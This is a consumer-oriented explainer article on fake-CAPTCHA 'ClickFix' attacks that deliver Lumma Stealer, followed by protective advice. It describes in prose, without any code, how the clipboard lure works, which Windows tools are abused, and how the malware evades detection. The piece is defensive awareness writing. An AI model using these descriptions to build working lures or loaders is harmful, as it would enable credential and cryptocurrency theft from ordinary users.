The Media Glen | Synexmedia.com
You have done it a thousand times. You land on a webpage, and a little box pops up asking you to prove you are not a robot. You click the checkbox. Maybe you pick out a few blurry photographs of traffic lights or fire hydrants. It takes four seconds. You move on with your life and never think about it again.
That trained behaviour, that muscle memory, is now being used to steal everything you own online. And the people doing it are counting on the fact that you won't stop to question the box. Because you never have before. Why would you start now?
This is the story of how a tiny piece of internet furniture, the CAPTCHA verification box, got turned into a weapon. Not a gun. Something quieter. More like a trapdoor built into your living room floor, disguised to look exactly like the carpet.
The Thing You Trust Without Thinking
CAPTCHA stands for Completely Automated Public Turing test to tell Computers and Humans Apart. That is a mouthful, which is why nobody calls it that. What matters is the idea behind it. Websites use CAPTCHAs to verify that the person clicking buttons is a real human being and not a bot trying to spam, scrape, or break things.
Google's reCAPTCHA and Cloudflare's Turnstile are the two systems you encounter most often. You see the little checkbox. You click it. Some invisible math happens on the back end, and the website decides you are probably human. This has been part of browsing the internet for over a decade.
And that is exactly the problem.
People trust CAPTCHAs the way they trust elevator buttons. The interaction is automatic. You do not read the fine print. You do not ask yourself whether the box is real. It looks right. It feels right. You click.
Somebody figured out that this automatic trust could be exploited. And once the first group figured it out, everybody else piled on.
How the Trick Works, Step by Step
Here is what happens. You are browsing the internet, maybe looking for a free movie stream, maybe clicking a link in an email, maybe visiting a website that got quietly compromised without its owner knowing. You land on a page, and up comes what looks exactly like a Cloudflare verification screen or a Google reCAPTCHA box. Same colours. Same fonts. Same little shield logo. Same checkbox.
But it is not real. It is a fake, built from scratch in a single HTML file, designed to look pixel-perfect.
You click the checkbox. Nothing actually verifies anything. Instead, a hidden script fires behind the curtain. It creates a tiny, invisible text box on the page, pastes a line of code into it, copies that code to your computer's clipboard, and deletes the text box. All of this happens in a fraction of a second. You see none of it.
Now comes the part that makes this attack work. A second set of instructions appears on the screen. They look official. They tell you to complete the verification by pressing three key combinations on your keyboard.
Step one, press Windows key plus R. That opens a small box on your computer called the Run dialogue, which lets you type commands directly into the operating system. Step two, press Control plus V. That pastes whatever is on your clipboard into the Run box. Step three, press Enter.
That is it. Three keystrokes. You just ran a command on your own computer, voluntarily, because a fake CAPTCHA told you to. And the command you pasted is not a verification code. It is an instruction that tells your computer to reach out to a server on the internet, download a file, and run it. The file is malware.
Why You Don't See the Danger
The malicious command pasted into the Run dialogue is deliberately designed so that most of it sits off-screen, hidden to the left. The only text visible in the narrow Run box is something innocent, something like: I am not a robot – reCAPTCHA Verification ID: 5mUiAHM. That's what you see. The actual command, the dangerous part, is scrolled out of view.
The attackers even use a trick with punctuation. In the scripting language the command is written in, a single quotation mark works like a comment marker. Everything after it gets ignored by the computer as a note. So the visible "verification ID" text is technically a comment, invisible to the machine, placed there purely to fool you.
You see a verification code. Your computer sees an order to download and install malware. Both of you are looking at the same text. Neither of you sees what the other one sees.
What Gets Installed on Your Machine
The malware delivered through this technique is most commonly something called Lumma Stealer. It is an information-stealing program that has been available for purchase on criminal forums since late 2022. It is sold as a subscription service, the same way you might subscribe to Netflix, except the product is a tool for robbing people.
Subscription tiers run from around $250 per month at the entry level up to $1,000 per month for premium features. For $20,000, a buyer can purchase the full source code. That price includes the right to resell.
The program is written in C and C++ with assembly language routines. It does not care what browser you use. Chrome, Firefox, Edge, Opera, Brave. It raids all of them. It grabs saved passwords, stored credit card numbers, autofill data, browsing history, and session cookies. Those cookies are particularly dangerous because they can let an attacker log into your accounts without needing your password at all. They just step into your existing session like putting on someone else's coat.
But it does not stop at browsers. The stealer searches for cryptocurrency wallet files. It looks for seed phrases, those strings of random words that serve as the master key to a crypto wallet. It hunts for password manager databases. It grabs login tokens from Discord, Telegram, and Steam. It takes screenshots of your desktop. It copies your clipboard contents. If you have remote desktop software like AnyDesk installed, it grabs those configuration files too, which can give attackers a way back into your machine later.
One of the more disturbing capabilities is its ability to turn your computer into a proxy server. Once infected, your internet connection can be rented out to other criminals, who route their traffic through your machine to hide their own location. Your IP address becomes their mask.
How It Hides
Lumma Stealer does not just run in the open. The delivery process uses multiple layers of obfuscation, meaning the actual malicious program is buried inside a series of encrypted wrappers, like a set of nesting dolls.
The initial command triggers a legitimate Windows program called mshta.exe. This is a real Microsoft tool, digitally signed, present on every Windows machine. It was designed to run small web-based scripts. But because it is a trusted system file, security software often lets it operate without interference. The attackers exploit that trust.
That trusted program then calls PowerShell, another legitimate Windows tool, to fetch the next stage. The next stage is encrypted. When it gets decrypted, it reveals another encrypted layer. And another. Security researchers at Trustwave documented one chain that used five separate layers of encryption and obfuscation before the actual malware appeared. One of the decryption keys in that chain was the phrase AMSI_RESULT_NOT_DETECTED, a mocking reference to Microsoft's own malware detection system.
The final stage of delivery uses a technique called process hollowing. The malware starts a legitimate Windows program, a program your security software already trusts, and scoops out its insides. It replaces the legitimate code running in memory with its own code, wearing the trusted program like a suit. A favourite target for this trick is BitLockerToGo.exe, a real Microsoft utility for managing encrypted USB drives. As far as your computer can tell, a normal Microsoft program is running. What is actually running inside that shell is the stealer.
There is even a variant that hides its code inside the pixel data of ordinary-looking PNG image files. The malicious payload is encoded into specific colour channels of the image. A normal image viewer would display the picture without issues. But the delivery script reads the raw pixel values, extracts the hidden code, decrypts it, and runs it entirely in memory without ever writing a file to disk. Security scanners that only examine files sitting on the hard drive will never see it.
How the Fake CAPTCHAs Reach You
The fake verification pages reach victims through several different channels, and this is part of what makes the technique so effective. There is no single attack vector to block.
The most common route is through compromised websites. By early 2025, security researchers had identified over nine thousand WordPress sites infected with malicious code that injects the fake CAPTCHA screen into normal browsing sessions. Most of these site owners had no idea their websites were being used as attack platforms. The compromise often happens through stolen login credentials or through fraudulent WordPress plugins that look legitimate but contain hidden code.
Malicious advertising is another major vector. One documented campaign pushed over one million ad impressions per day across three thousand websites, mostly pirate streaming sites and cracked software download pages. The ads used a legitimate advertising network for distribution and a traffic analytics service for cloaking, meaning the malicious ads could detect when they were being analysed by a security researcher and serve harmless content instead.
Phishing emails carry the fake CAPTCHAs too. Some impersonate GitHub security alerts, sending developers to fake pages where they are told to verify their identity. Others disguise themselves as hotel booking confirmations or invoice notifications.
There have even been tutorial videos posted to social media platforms showing viewers how to "activate" pirated software. The tutorials walk people through the exact keyboard sequence needed to trigger the infection, presenting the malware execution as a normal part of the software activation process.
Legitimate cloud services get abused as hosting infrastructure for the fake pages. One analysis found that nearly a quarter of all identified fake CAPTCHA hosts were using a major content delivery network's infrastructure, including its web hosting, cloud storage, and proxy services. Amazon cloud storage buckets, Oracle Cloud instances, and various content delivery networks have all been caught hosting the malicious pages.
One of the more creative infrastructure tricks involves storing malicious code on a cryptocurrency blockchain. Because blockchain data cannot be modified or removed once written, the attackers can store their malicious JavaScript and download links in blockchain smart contracts. Traditional domain blocking does not work against this technique. You cannot send a takedown notice to a blockchain.
The Technique Has a Name, and It Keeps Evolving
Security researchers call this class of attack "ClickFix." The name was coined by the threat intelligence firm Proofpoint, which first documented it in March 2024. But the technique did not stay static. It kept changing.
The original version, from early 2024, used fake error messages rather than CAPTCHAs. Pages pretended to be Microsoft Word, Google Chrome, or OneDrive, displaying fake error dialogues that told users to copy and paste a fix. Over a hundred thousand emails were sent in the initial campaigns, targeting thousands of organisations.
By mid-2024, the fake CAPTCHA variant emerged. This was the version that really took off, because it exploited the deepest kind of trained internet behaviour. People have been trained for years to expect CAPTCHAs. They have been trained to comply with them without thinking. Security researchers call this "verification fatigue."
Then the variants started multiplying. One version, discovered in 2025, instructs users to paste commands into the File Explorer address bar instead of the Run dialogue. Another forces the user's browser to crash deliberately, then presents the fake CAPTCHA as part of a "recovery" process. A third variant uses DNS lookup commands instead of PowerShell, fetching instructions through the domain name system rather than through web downloads. Underground criminal markets now sell ready-made ClickFix toolkits with customisable lures and sandbox detection for anywhere from $200 to $1,500 per month.
The technique is not limited to Windows anymore. Variants targeting macOS have been documented, instructing users to open the Terminal application and paste commands there instead.
And it is not limited to criminal gangs. State-sponsored intelligence services from at least three countries have adopted the technique for espionage operations. North Korean groups have used it to target think tanks and software developers. An Iranian group used it to impersonate Microsoft security updates and target organisations across the Middle East, timing the fake updates to coincide with real Microsoft Patch Tuesday releases so the lure would seem plausible. Russian military intelligence used it to deliver espionage tools through fake Google Spreadsheet prompts.
When intelligence services with nation-state resources look at a criminal technique and decide it is good enough to adopt for their own operations, that tells you something about how effective the technique is.
The Numbers
By mid-2025, security vendor analysis concluded that ClickFix-style attacks accounted for 47 per cent of all observed initial access compromises. Nearly half. One technique. That figure comes from Microsoft's own analysis published in August 2025.
The FBI attributed roughly ten million infections worldwide to Lumma Stealer specifically. Microsoft identified 394,000 infected Windows computers in just a two-month window between March and May of 2025. One security firm tracked 13,695 unique hosts serving ClickFix pages across approximately 500 different hosting providers in a span of two and a half months.
Detections of Lumma Stealer surged 369 per cent between the first and second halves of 2024. ClickFix attacks grew another 517 per cent between the second half of 2024 and the first half of 2025. The growth curve looked less like a trend and more like an explosion.
Countries hit hardest include India, Brazil, Spain, France, the United States, Mexico, Peru, Poland, Germany, and Canada. The affected industries cover telecommunications, healthcare, banking, technology, manufacturing, education, and government. Some compromised hosts were found running on government and military infrastructure.
The Takedown That Didn't Stick
On May 21, 2025, a coordinated international operation tried to shut the whole thing down. Microsoft's Digital Crimes Unit led the effort, partnering with the U.S. Department of Justice, the FBI, Europol, and security firms including ESET, Bitsight, and Cloudflare. A court order out of the Northern District of Georgia authorised the seizure of approximately 2,300 malicious domains. The Department of Justice seized five core administration panel domains. The FBI even posted messages inside the operators' own Telegram channels, claiming that administrators were cooperating with law enforcement.
Europol called Lumma Stealer "the world's most significant infostealer threat."
It did not matter.
No arrests were made. The developer, believed to be based in Russia, claimed through online channels that authorities had accessed a server through a hardware vulnerability but that functionality had been restored quickly. Within weeks, Lumma Stealer was back to pre-takedown activity levels, operating through new domains registered at a rate of approximately 74 per week. The infrastructure simply moved to Russian hosting providers.
Seizing 2,300 domains sounds impressive until you realise that over 3,300 unique command-and-control domains had been tracked in a single year of observation, and the operators could spin up replacements faster than anyone could take them down.
Domain seizure as a countermeasure has structural limits. It works against operators who cannot easily relocate. It does not work against operators who have already built their infrastructure to be disposable.
Can It Still Be Done Today?
Yes.
Every component of this attack is still fully functional as of early 2026. The social engineering trick has not been patched because it does not exploit a software bug. It exploits a human habit. There is no update Microsoft can push, no code Cloudflare can write, that fixes the fact that people have been conditioned to comply with CAPTCHA prompts without scrutiny.
The Windows Run dialogue still exists on every Windows machine. Mshta.exe still ships with every copy of Windows. PowerShell still allows the execution of remotely fetched scripts by default. The clipboard API that allows websites to silently write to your clipboard still functions in major browsers. None of these individual components are flaws by themselves. Each one has a legitimate purpose. But strung together by a social engineering trick, they become an infection chain.
New variants continue to appear. The CrashFix variant from January 2026 is particularly clever, because it removes the question of "why is this website asking me to do something unusual?" by first making the browser crash. When the crash recovery page appears with the fake CAPTCHA, the user already has a plausible explanation in mind: something went wrong, and this is part of fixing it. The technique feeds on the user's own rationalisation.
The DNS-based variant discovered in February 2026 is another adaptation. Some organisations have started blocking PowerShell web requests as a defence. So the new variant uses nslookup, a different Windows command used for looking up domain name records, to fetch instructions through the DNS system instead. Block one path, and the attackers find another.
The criminal marketplace for this technique is thriving. Ready-made toolkits are available for purchase. The attack does not require significant technical skill to deploy. If you can set up a webpage, you can run a ClickFix campaign.
How to Protect Yourself
The single most important thing to understand is this: a real CAPTCHA will never ask you to press keyboard shortcuts, open a Run dialogue, paste commands, or interact with anything outside your web browser. A real CAPTCHA lives entirely within the browser window. You click a checkbox. You identify some photographs. That is it. The moment a "verification" page asks you to use your keyboard to perform system operations, you are looking at an attack.
If a website ever asks you to press Windows plus R as part of proving you are human, close the tab. Do not follow the instructions. Do not paste anything. Close the tab and leave.
For organisations, the technical defences are concrete. Group Policy can be used to disable the Run dialogue for standard users, which closes the primary entry point entirely. Application control policies like AppLocker can block the execution of mshta.exe, which breaks the most common version of the attack chain. PowerShell can be configured to run in Constrained Language Mode, which limits the commands it can execute. Script Block Logging can be enabled to record exactly what PowerShell commands are run, creating an audit trail.
DNS filtering that blocks newly registered domains is effective because the command-and-control infrastructure relies on fresh domains, particularly ones using certain top-level domains like .shop, .top, and .icu. Blocking domains that are less than 30 days old will catch a significant portion of this traffic.
There is even a free, open-source browser extension called StopFix that monitors your clipboard for the presence of system commands and alerts you if a website has silently placed something dangerous there. It is available on GitHub.
But none of these technical measures matter as much as the simple awareness that this trick exists. The attack works because people do not know it is a thing. Once you know that fake CAPTCHAs are a real threat, you are almost impossible to fool by one. The entire attack depends on the victim never having heard of it.
Now you have heard of it.
Behind the Story
This article contains no fictional elements. All technical details, statistics, timelines, and operational descriptions are drawn from published reports by Proofpoint, Microsoft, Qualys, Sekoia, Trustwave SpiderLabs, ESET, Kaspersky, Guardio Labs, Netskope, McAfee Labs, Huntress, Trend Micro, Bitdefender, Lab539, CISA/FBI Joint Advisory AA25-141B, and Europol.
Specific threat actor names and aliases have been excluded except where attribution has been made publicly by government agencies or major security vendors. Technical jargon has been translated into plain language throughout. Where simplified explanations risk inaccuracy, the more precise technical terminology has been preserved and explained in context.
The ClickFix/fake CAPTCHA technique and Lumma Stealer malware remain active threats as of March 2026. Readers who suspect they may have been compromised should change all saved passwords, enable two-factor authentication on critical accounts, and scan their systems with reputable security software. Organisations should review their PowerShell execution policies and consider the Group Policy mitigations described in this article.
Canadian spelling has been used throughout this article and verified.